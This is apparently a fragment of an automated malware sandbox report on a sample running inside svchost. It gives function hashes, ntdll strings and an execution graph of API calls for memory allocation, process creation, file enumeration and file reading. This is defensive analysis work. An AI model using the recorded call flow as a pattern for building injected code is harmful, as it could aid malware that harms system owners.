                                          • API String ID:
                                          • Opcode ID: 6788562e8e983b300f9bf29eabbf1986e601c5e65499951b0e880f53bc649482
                                          • Instruction ID: a73d70b26dc13e65620a629f34f1aa02e7663319655713b10b705c0158acf1b1
                                          • Opcode Fuzzy Hash: 6788562e8e983b300f9bf29eabbf1986e601c5e65499951b0e880f53bc649482
                                          • Instruction Fuzzy Hash: 1890023120140C42D100B6584444B86000687E4301F95C116A0124758E8755C9517521
                                          Function 03672CF0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 36963c9749f21c2174d5b8e9c5c410bbf833b98a27767b7951a71fe7bb7f70d1
                                          • Instruction ID: 18c4a8923d9017b505c535c34a9086cceea6c34b9e5366c63e0909e620ee77c9
                                          • Opcode Fuzzy Hash: 36963c9749f21c2174d5b8e9c5c410bbf833b98a27767b7951a71fe7bb7f70d1
                                          • Instruction Fuzzy Hash: 6190023120140803D100B6585548747000687D4301F95D511A042465CED79689516121
                                          Function 03672CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 54b5fefee22b49489c531166c3df5c1e43fbb8c0aea5a7437d7fb54b2de1946d
                                          • Instruction ID: 48922546de11365eb2e63827ff35ded3a45b52560a1eb52c2694c6cd9b21ee5b
                                          • Opcode Fuzzy Hash: 54b5fefee22b49489c531166c3df5c1e43fbb8c0aea5a7437d7fb54b2de1946d
                                          • Instruction Fuzzy Hash: A590022160540802D140B6585458746001687D4301F95D111A0024658EC7998B5566A1
                                          Function 03672CA0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dfbeefffa24b521b8078332ff1d50c2c3c2a5e021f386f356bb0a8ed433b041b
                                          • Instruction ID: 4947b2c852d1bbb9d6bcd5b7e1280a91f65a64248abaac80ad49a95163ad975f
                                          • Opcode Fuzzy Hash: dfbeefffa24b521b8078332ff1d50c2c3c2a5e021f386f356bb0a8ed433b041b
                                          • Instruction Fuzzy Hash: 5290023120140802D100BA985448686000687E4301F95D111A5024659FC7A589916131
                                          Function 03672C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: 829bb9b762ae8f925790c83f671aa4208fa631a060d9be7762ffabc54cb6b263
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:
                                          Function 03672890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 62274f3d15778049b9603b58f2e1dae6207422e339c7e0b86b6d3061ec76189d
                                          • Instruction ID: 282589b5143b222d48a16e6871b8351cf7c825e08d96a27db41d0a5a55bc5096
                                          • Opcode Fuzzy Hash: 62274f3d15778049b9603b58f2e1dae6207422e339c7e0b86b6d3061ec76189d
                                          • Instruction Fuzzy Hash: 2F51D9B5A04516BFCB10DF9DC9A097EF7B8BB08200B58866AE4A5D7741D334DE44CBE4
                                          Function 03667630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                          Download Yara Rule
                                          Strings
                                          • ExecuteOptions, xrefs: 036A46A0
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036A4742
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036A46FC
                                          • Execute=1, xrefs: 036A4713
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036A4655
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 036A4787
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 036A4725
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: 9e208eae6c112bdfcc5b132b00a8479ea66971f77d7d8301a0a4321d5eefc711
                                          • Instruction ID: 05985d717170dcfd592e2691e2d81588a5619331c743dbb5f3b07073dd2b2b65
                                          • Opcode Fuzzy Hash: 9e208eae6c112bdfcc5b132b00a8479ea66971f77d7d8301a0a4321d5eefc711
                                          • Instruction Fuzzy Hash: 76514935A003097ADF21EBA9DC89FAE77B8EF05348F0800ADD505EB291EB719E518F54
                                          Function 0367B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-$0$0
                                          • API String ID: 1302938615-699404926
                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction ID: 4d750a17a3fadbc85023cf9ac478ac7b3aee9617a1255f6828546db23ea22687
                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction Fuzzy Hash: FA81F170E052499EDF28CF68C9957FEBBB6AF45320F9C425ED861AB390C7308851CB54
                                          Function 0365F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                          Download Yara Rule
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036A02E7
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036A02BD
                                          • RTL: Re-Waiting, xrefs: 036A031E
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                          • API String ID: 0-2474120054
                                          • Opcode ID: 5c9d4e05ed4a05016203769acde3f14b68fe71f49a5af58ff29875d289cb6bb5
                                          • Instruction ID: e1a06293db47928e79b114aa7b7cb4fa5c352d3c65127280c81266835c73c532
                                          • Opcode Fuzzy Hash: 5c9d4e05ed4a05016203769acde3f14b68fe71f49a5af58ff29875d289cb6bb5
                                          • Instruction Fuzzy Hash: EFE1AC30604B41DFD724CF28C984B6ABBE4BB88324F184A6DF9A58B3E1D775D945CB42
                                          Function 0366BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                          Download Yara Rule
                                          Strings
                                          • RTL: Resource at %p, xrefs: 036A7B8E
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 036A7B7F
                                          • RTL: Re-Waiting, xrefs: 036A7BAC
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 0-871070163
                                          • Opcode ID: 64f37b5f49c7cbb868b5435088455b61dd17b3d134c2b7a30f8c2c38b70c79f2
                                          • Instruction ID: feb268656fc47c528e7ff28105b3daa6eb5c38468374b890b9c267555df3ac5b
                                          • Opcode Fuzzy Hash: 64f37b5f49c7cbb868b5435088455b61dd17b3d134c2b7a30f8c2c38b70c79f2
                                          • Instruction Fuzzy Hash: BF41E2353007029FC724DE6ACD40B6AB7E9EF88760F140A2DE85ADB790DB70E8058F95
                                          Function 0366B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                          Download Yara Rule
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036A728C
                                          Strings
                                          • RTL: Resource at %p, xrefs: 036A72A3
                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 036A7294
                                          • RTL: Re-Waiting, xrefs: 036A72C1
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-605551621
                                          • Opcode ID: eadc5b00081f3aadb6cbecddb9363a37769cfbc81df39061fd386689d66f5c40
                                          • Instruction ID: 04b42fad36b6039b66cb56d291645ff32dcfac5944f209c950a4f202eecddb28
                                          • Opcode Fuzzy Hash: eadc5b00081f3aadb6cbecddb9363a37769cfbc81df39061fd386689d66f5c40
                                          • Instruction Fuzzy Hash: EF41F035700606ABC720DE69CD41B6ABBA5FF84750F180629F855EB340DB30E8528BE9
                                          Function 03677D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-
                                          • API String ID: 1302938615-2137968064
                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction ID: f82a028039bac5f867c5f5652d00895fb62e3b3093866cae76172b3a19d50c72
                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction Fuzzy Hash: 8691C470E0021A9BDF24DF69CA81ABEB7B5FF44320F98461AE865E73C0D7349942CB50
                                          Function 03639126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$@
                                          • API String ID: 0-1194432280
                                          • Opcode ID: acdebb8ea35163df2eeac3271beeb3f80a1e650ea2a114cdc3a458077ae52a89
                                          • Instruction ID: 807ae5e144d08af22ae12aa8f1ad19beb77c177cd9253d130fb62a99f8eed811
                                          • Opcode Fuzzy Hash: acdebb8ea35163df2eeac3271beeb3f80a1e650ea2a114cdc3a458077ae52a89
                                          • Instruction Fuzzy Hash: E7813A76D002699BDB31DF54CD54BEABBB8AF08710F0445EAE909B7280D7709E81CFA4

                                          Execution Graph

                                          Execution Coverage:3.1%
                                          Dynamic/Decrypted Code Coverage:3.9%
                                          Signature Coverage:1.4%
                                          Total number of Nodes:483
                                          Total number of Limit Nodes:74
                                          execution_graph 83369 3932ad0 LdrInitializeThunk 83370 2f7af70 83373 2f9ae80 83370->83373 83372 2f7c5e1 83376 2f98f70 83373->83376 83375 2f9aeb1 83375->83372 83377 2f99005 83376->83377 83379 2f98f9b 83376->83379 83378 2f9901b NtAllocateVirtualMemory 83377->83378 83378->83375 83379->83375 83380 2f86bb0 83381 2f86bcc 83380->83381 83385 2f86c1b 83380->83385 83381->83385 83390 2f98e00 83381->83390 83382 2f86d4f 83384 2f86be7 83393 2f85f90 NtClose LdrInitializeThunk LdrInitializeThunk 83384->83393 83385->83382 83394 2f85f90 NtClose LdrInitializeThunk LdrInitializeThunk 83385->83394 83387 2f86d29 83387->83382 83395 2f86160 NtClose LdrInitializeThunk LdrInitializeThunk 83387->83395 83391 2f98e1a 83390->83391 83392 2f98e2b NtClose 83391->83392 83392->83384 83393->83385 83394->83387 83395->83382 83396 2f98af0 83397 2f98ba7 83396->83397 83399 2f98b1f 83396->83399 83398 2f98bbd NtCreateFile 83397->83398 83405 2f9c130 83408 2f9af10 83405->83408 83411 2f99180 83408->83411 83410 2f9af29 83412 2f9919a 83411->83412 83413 2f991ab RtlFreeHeap 83412->83413 83413->83410 83414 2f8f274 83415 2f8f2d4 83414->83415 83443 2f85d00 83415->83443 83417 2f8f40e 83418 2f8f407 83418->83417 83449 2f85e10 83418->83449 83420 2f8f48a 83421 2f8f5c2 83420->83421 83440 2f8f5b3 83420->83440 83453 2f8f050 83420->83453 83422 2f98e00 NtClose 83421->83422 83424 2f8f5cc 83422->83424 83425 2f8f4c6 83425->83421 83426 2f8f4d1 83425->83426 83462 2f9aff0 83426->83462 83428 2f8f4fa 83429 2f8f519 83428->83429 83430 2f8f503 83428->83430 83465 2f8ef40 CoInitialize 83429->83465 83431 2f98e00 NtClose 83430->83431 83433 2f8f50d 83431->83433 83434 2f8f527 83468 2f988b0 83434->83468 83436 2f8f5a2 83437 2f98e00 NtClose 83436->83437 83438 2f8f5ac 83437->83438 83439 2f9af10 RtlFreeHeap 83438->83439 83439->83440 83441 2f8f545 83441->83436 83442 2f988b0 LdrInitializeThunk 83441->83442 83442->83441 83444 2f85d33 83443->83444 83447 2f85d57 83444->83447 83472 2f98950 83444->83472 83446 2f85d7a 83446->83447 83448 2f98e00 NtClose 83446->83448 83447->83418 83448->83447 83450 2f85e35 83449->83450 83477 2f98740 83450->83477 83454 2f8f06c 83453->83454 83482 2f83f90 83454->83482 83456 2f8f093 83456->83425 83457 2f8f08a 83457->83456 83458 2f83f90 LdrLoadDll 83457->83458 83459 2f8f15e 83458->83459 83460 2f83f90 LdrLoadDll 83459->83460 83461 2f8f1b8 83459->83461 83460->83461 83461->83425 83487 2f99130 83462->83487 83464 2f9b00b 83464->83428 83467 2f8efa5 83465->83467 83466 2f8f03b CoUninitialize 83466->83434 83467->83466 83469 2f988ca 83468->83469 83490 3932ba0 LdrInitializeThunk 83469->83490 83470 2f988fa 83470->83441 83473 2f9896a 83472->83473 83476 3932ca0 LdrInitializeThunk 83473->83476 83474 2f98996 83474->83446 83476->83474 83478 2f9875a 83477->83478 83481 3932c60 LdrInitializeThunk 83478->83481 83479 2f85ea9 83479->83420 83481->83479 83484 2f83fb4 83482->83484 83483 2f83fbb 83483->83457 83484->83483 83485 2f83ff0 LdrLoadDll 83484->83485 83486 2f84007 83484->83486 83485->83486 83486->83457 83488 2f9914d 83487->83488 83489 2f9915e RtlAllocateHeap 83488->83489 83489->83464 83490->83470 83491 2f85675 83492 2f8567d 83491->83492 83493 2f85613 83491->83493 83498 2f87b40 83493->83498 83495 2f85620 83497 2f8564c 83495->83497 83502 2f87ac0 83495->83502 83499 2f87b53 83498->83499 83509 2f98320 83499->83509 83501 2f87b7e 83501->83495 83503 2f87b04 83502->83503 83504 2f87b25 83503->83504 83515 2f980f0 83503->83515 83504->83495 83506 2f87b15 83507 2f87b31 83506->83507 83508 2f98e00 NtClose 83506->83508 83507->83495 83508->83504 83510 2f9839e 83509->83510 83511 2f9834b 83509->83511 83514 3932dd0 LdrInitializeThunk 83510->83514 83511->83501 83512 2f983c3 83512->83501 83514->83512 83516 2f9816a 83515->83516 83518 2f98118 83515->83518 83520 3934650 LdrInitializeThunk 83516->83520 83517 2f9818f 83517->83506 83518->83506 83520->83517 83521 2f79aa0 83522 2f79aaf 83521->83522 83523 2f79af0 83522->83523 83524 2f79add CreateThread 83522->83524 83525 2f807e0 83526 2f807fa 83525->83526 83527 2f83f90 LdrLoadDll 83526->83527 83528 2f80818 83527->83528 83529 2f8085d 83528->83529 83530 2f8084c PostThreadMessageW 83528->83530 83530->83529 83531 2f88261 83532 2f88271 83531->83532 83534 2f881bb 83532->83534 83535 2f869e0 LdrInitializeThunk LdrInitializeThunk 83532->83535 83535->83534 83536 2f91499 83537 2f9149f 83536->83537 83538 2f98e00 NtClose 83537->83538 83540 2f914a4 83537->83540 83539 2f914c9 83538->83539 83542 2f81d5b 83543 2f81d34 83542->83543 83544 2f81d01 83542->83544 83548 2f81d1b 83544->83548 83549 2f98420 83544->83549 83550 2f9843a 83549->83550 83558 3932c0a 83550->83558 83551 2f81d06 83553 2f98ea0 83551->83553 83554 2f98f2c 83553->83554 83555 2f98ec8 83553->83555 83561 3932e80 LdrInitializeThunk 83554->83561 83555->83548 83556 2f98f5d 83556->83548 83559 3932c11 83558->83559 83560 3932c1f LdrInitializeThunk 83558->83560 83559->83551 83560->83551 83561->83556 83562 2f8965f 83563 2f89669 83562->83563 83566 2f896c2 83562->83566 83564 2f89676 83563->83564 83565 2f9af10 RtlFreeHeap 83563->83565 83565->83564 83567 2f8a790 83572 2f8a4a0 83567->83572 83569 2f8a79d 83586 2f8a120 83569->83586 83571 2f8a7b9 83573 2f8a4c5 83572->83573 83597 2f87db0 83573->83597 83576 2f8a613 83576->83569 83578 2f8a62a 83578->83569 83579 2f8a621 83579->83578 83581 2f8a717 83579->83581 83616 2f89b70 83579->83616 83582 2f8a77a 83581->83582 83625 2f89ee0 83581->83625 83584 2f9af10 RtlFreeHeap 83582->83584 83585 2f8a781 83584->83585 83585->83569 83587 2f8a136 83586->83587 83590 2f8a141 83586->83590 83588 2f9aff0 RtlAllocateHeap 83587->83588 83588->83590 83589 2f8a162 83589->83571 83590->83589 83591 2f87db0 GetFileAttributesW 83590->83591 83592 2f8a472 83590->83592 83595 2f89b70 RtlFreeHeap 83590->83595 83596 2f89ee0 RtlFreeHeap 83590->83596 83591->83590 83593 2f8a48b 83592->83593 83594 2f9af10 RtlFreeHeap 83592->83594 83593->83571 83594->83593 83595->83590 83596->83590 83598 2f87dd1 83597->83598 83599 2f87dd8 GetFileAttributesW 83598->83599 83600 2f87de3 83598->83600 83599->83600 83600->83576 83601 2f92db0 83600->83601 83602 2f92dbe 83601->83602 83603 2f92dc5 83601->83603 83602->83579 83604 2f83f90 LdrLoadDll 83603->83604 83605 2f92dfa 83604->83605 83606 2f92e09 83605->83606 83629 2f92870 LdrLoadDll 83605->83629 83607 2f9aff0 RtlAllocateHeap 83606->83607 83612 2f92fb4 83606->83612 83609 2f92e22 83607->83609 83610 2f92faa 83609->83610 83609->83612 83613 2f92e3e 83609->83613 83611 2f9af10 RtlFreeHeap 83610->83611 83610->83612 83611->83612 83612->83579 83613->83612 83614 2f9af10 RtlFreeHeap 83613->83614 83615 2f92f9e 83614->83615 83615->83579 83617 2f89b96 83616->83617 83630 2f8d5b0 83617->83630 83619 2f89c08 83621 2f89d90 83619->83621 83623 2f89c26 83619->83623 83620 2f89d75 83620->83579 83621->83620 83622 2f89a30 RtlFreeHeap 83621->83622 83622->83621 83623->83620 83634 2f89a30 83623->83634 83626 2f89f06 83625->83626 83627 2f8d5b0 RtlFreeHeap 83626->83627 83628 2f89f8d 83627->83628 83628->83581 83629->83606 83631 2f8d5d4 83630->83631 83632 2f8d5e1 83631->83632 83633 2f9af10 RtlFreeHeap 83631->83633 83632->83619 83633->83632 83635 2f89a4d 83634->83635 83638 2f8d640 83635->83638 83637 2f89b53 83637->83623 83639 2f8d664 83638->83639 83640 2f8d70e 83639->83640 83641 2f9af10 RtlFreeHeap 83639->83641 83640->83637 83641->83640 83642 2f86d90 83643 2f86da8 83642->83643 83645 2f86e02 83642->83645 83643->83645 83646 2f8acc0 83643->83646 83647 2f8ace6 83646->83647 83648 2f8af19 83647->83648 83673 2f99210 83647->83673 83648->83645 83650 2f8ad5c 83650->83648 83676 2f9c200 83650->83676 83652 2f8ad7b 83652->83648 83653 2f8ae52 83652->83653 83654 2f98420 LdrInitializeThunk 83652->83654 83655 2f85570 LdrInitializeThunk 83653->83655 83657 2f8ae71 83653->83657 83656 2f8addd 83654->83656 83655->83657 83656->83653 83661 2f8ade6 83656->83661 83659 2f8af01 83657->83659 83685 2f97f90 83657->83685 83658 2f8ae3a 83660 2f87b40 LdrInitializeThunk 83658->83660 83667 2f87b40 LdrInitializeThunk 83659->83667 83666 2f8ae48 83660->83666 83661->83648 83661->83658 83662 2f8ae18 83661->83662 83682 2f85570 83661->83682 83700 2f941e0 LdrInitializeThunk 83662->83700 83666->83645 83669 2f8af0f 83667->83669 83668 2f8aed8 83690 2f98040 83668->83690 83669->83645 83671 2f8aef2 83695 2f981a0 83671->83695 83674 2f9922a 83673->83674 83675 2f9923b CreateProcessInternalW 83674->83675 83675->83650 83677 2f9c170 83676->83677 83678 2f9aff0 RtlAllocateHeap 83677->83678 83679 2f9c1cd 83677->83679 83680 2f9c1aa 83678->83680 83679->83652 83681 2f9af10 RtlFreeHeap 83680->83681 83681->83679 83701 2f985f0 83682->83701 83684 2f855ae 83684->83662 83686 2f9800d 83685->83686 83687 2f97fbb 83685->83687 83707 39339b0 LdrInitializeThunk 83686->83707 83687->83668 83688 2f98032 83688->83668 83691 2f980bd 83690->83691 83693 2f9806b 83690->83693 83708 3934340 LdrInitializeThunk 83691->83708 83692 2f980e2 83692->83671 83693->83671 83696 2f9821a 83695->83696 83697 2f981c8 83695->83697 83709 3932fb0 LdrInitializeThunk 83696->83709 83697->83659 83698 2f9823f 83698->83659 83700->83658 83702 2f9869e 83701->83702 83704 2f9861c 83701->83704 83706 3932d10 LdrInitializeThunk 83702->83706 83703 2f986e3 83703->83684 83704->83684 83706->83703 83707->83688 83708->83692 83709->83698 83710 2f8fb50 83711 2f8fb6d 83710->83711 83712 2f83f90 LdrLoadDll 83711->83712 83713 2f8fb8b 83712->83713 83714 2f90d11 83726 2f98c60 83714->83726 83716 2f90d32 83717 2f90d50 83716->83717 83718 2f90d65 83716->83718 83720 2f98e00 NtClose 83717->83720 83719 2f98e00 NtClose 83718->83719 83723 2f90d6e 83719->83723 83721 2f90d59 83720->83721 83722 2f90da5 83723->83722 83724 2f9af10 RtlFreeHeap 83723->83724 83725 2f90d99 83724->83725 83727 2f98d04 83726->83727 83729 2f98c88 83726->83729 83728 2f98d1a NtReadFile 83727->83728 83728->83716 83729->83716 83730 2f95ad0 83731 2f95b2a 83730->83731 83732 2f95b37 83731->83732 83734 2f934d0 83731->83734 83735 2f934f7 83734->83735 83736 2f9ae80 NtAllocateVirtualMemory 83735->83736 83737 2f93511 83736->83737 83738 2f83f90 LdrLoadDll 83737->83738 83740 2f9360d 83737->83740 83741 2f93557 83738->83741 83739 2f93595 Sleep 83739->83741 83740->83732 83741->83739 83741->83740 83742 2f98250 83743 2f982df 83742->83743 83745 2f9827b 83742->83745 83747 3932ee0 LdrInitializeThunk 83743->83747 83744 2f98310 83747->83744 83748 2f983d0 83749 2f983ed 83748->83749 83752 3932df0 LdrInitializeThunk 83749->83752 83750 2f98415 83752->83750 83753 2f98d50 83754 2f98d7f 83753->83754 83755 2f98dca 83753->83755 83756 2f98de0 NtDeleteFile 83755->83756 83757 2f91510 83761 2f91529 83757->83761 83758 2f91571 83759 2f9af10 RtlFreeHeap 83758->83759 83760 2f91581 83759->83760 83761->83758 83762 2f915b4 83761->83762 83764 2f915b9 83761->83764 83763 2f9af10 RtlFreeHeap 83762->83763 83763->83764 83767 2f8214d 83770 2f82150 83767->83770 83772 2f821ab 83767->83772 83768 2f85d00 2 API calls 83769 2f821d3 83768->83769 83771 2f83f90 LdrLoadDll 83770->83771 83771->83772 83772->83768 83772->83769 83773 2f79b00 83775 2f79b78 83773->83775 83774 2f7a100 83775->83774 83777 2f9ab70 83775->83777 83778 2f9ab96 83777->83778 83783 2f740d0 83778->83783 83780 2f9aba2 83781 2f9abdb 83780->83781 83786 2f95060 83780->83786 83781->83774 83790 2f82c50 83783->83790 83785 2f740dd 83785->83780 83787 2f950c2 83786->83787 83789 2f950cf 83787->83789 83801 2f81410 83787->83801 83789->83781 83791 2f82c6a 83790->83791 83793 2f82c83 83791->83793 83794 2f99890 83791->83794 83793->83785 83796 2f998aa 83794->83796 83795 2f998d9 83795->83793 83796->83795 83797 2f98420 LdrInitializeThunk 83796->83797 83798 2f99939 83797->83798 83799 2f9af10 RtlFreeHeap 83798->83799 83800 2f99952 83799->83800 83800->83793 83802 2f8144b 83801->83802 83817 2f878d0 83802->83817 83804 2f81453 83805 2f9aff0 RtlAllocateHeap 83804->83805 83816 2f81723 83804->83816 83806 2f81469 83805->83806 83807 2f9aff0 RtlAllocateHeap 83806->83807 83808 2f81476 83807->83808 83809 2f9aff0 RtlAllocateHeap 83808->83809 83810 2f81487 83809->83810 83812 2f8151a 83810->83812 83832 2f86460 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 83810->83832 83813 2f83f90 LdrLoadDll 83812->83813 83814 2f816d2 83813->83814 83828 2f979a0 83814->83828 83816->83789 83818 2f878fc 83817->83818 83833 2f877c0 83818->83833 83821 2f87929 83823 2f87934 83821->83823 83825 2f98e00 NtClose 83821->83825 83822 2f87941 83824 2f8795d 83822->83824 83826 2f98e00 NtClose 83822->83826 83823->83804 83824->83804 83825->83823 83827 2f87953 83826->83827 83827->83804 83829 2f97a02 83828->83829 83831 2f97a0f 83829->83831 83844 2f81740 83829->83844 83831->83816 83832->83812 83834 2f877da 83833->83834 83838 2f878b6 83833->83838 83839 2f984c0 83834->83839 83837 2f98e00 NtClose 83837->83838 83838->83821 83838->83822 83840 2f984da 83839->83840 83843 39335c0 LdrInitializeThunk 83840->83843 83841 2f878aa 83841->83837 83843->83841 83860 2f87ba0 83844->83860 83846 2f81cb5 83846->83831 83847 2f81760 83847->83846 83864 2f90b50 83847->83864 83850 2f8197a 83852 2f9c200 2 API calls 83850->83852 83851 2f817be 83851->83846 83867 2f9c0d0 83851->83867 83854 2f8198f 83852->83854 83853 2f87b40 LdrInitializeThunk 83856 2f819dc 83853->83856 83854->83856 83872 2f80270 83854->83872 83856->83846 83856->83853 83857 2f80270 LdrInitializeThunk 83856->83857 83857->83856 83858 2f81b30 83858->83856 83859 2f87b40 LdrInitializeThunk 83858->83859 83859->83858 83861 2f87bad 83860->83861 83862 2f87bce SetErrorMode 83861->83862 83863 2f87bd5 83861->83863 83862->83863 83863->83847 83865 2f9ae80 NtAllocateVirtualMemory 83864->83865 83866 2f90b71 83865->83866 83866->83851 83868 2f9c0e0 83867->83868 83869 2f9c0e6 83867->83869 83868->83850 83870 2f9aff0 RtlAllocateHeap 83869->83870 83871 2f9c10c 83870->83871 83871->83850 83873 2f80281 83872->83873 83876 2f99090 83873->83876 83877 2f990aa 83876->83877 83880 3932c70 LdrInitializeThunk 83877->83880 83878 2f80292 83878->83858 83880->83878 83881 2f8c040 83883 2f8c069 83881->83883 83882 2f8c16d 83883->83882 83884 2f8c113 FindFirstFileW 83883->83884 83884->83882 83886 2f8c12e 83884->83886 83885 2f8c154 FindNextFileW 83885->83886 83887 2f8c166 FindClose 83885->83887 83886->83885 83887->83882 83888 2f867c0 83889 2f867ea 83888->83889 83892 2f87970 83889->83892 83891 2f86814 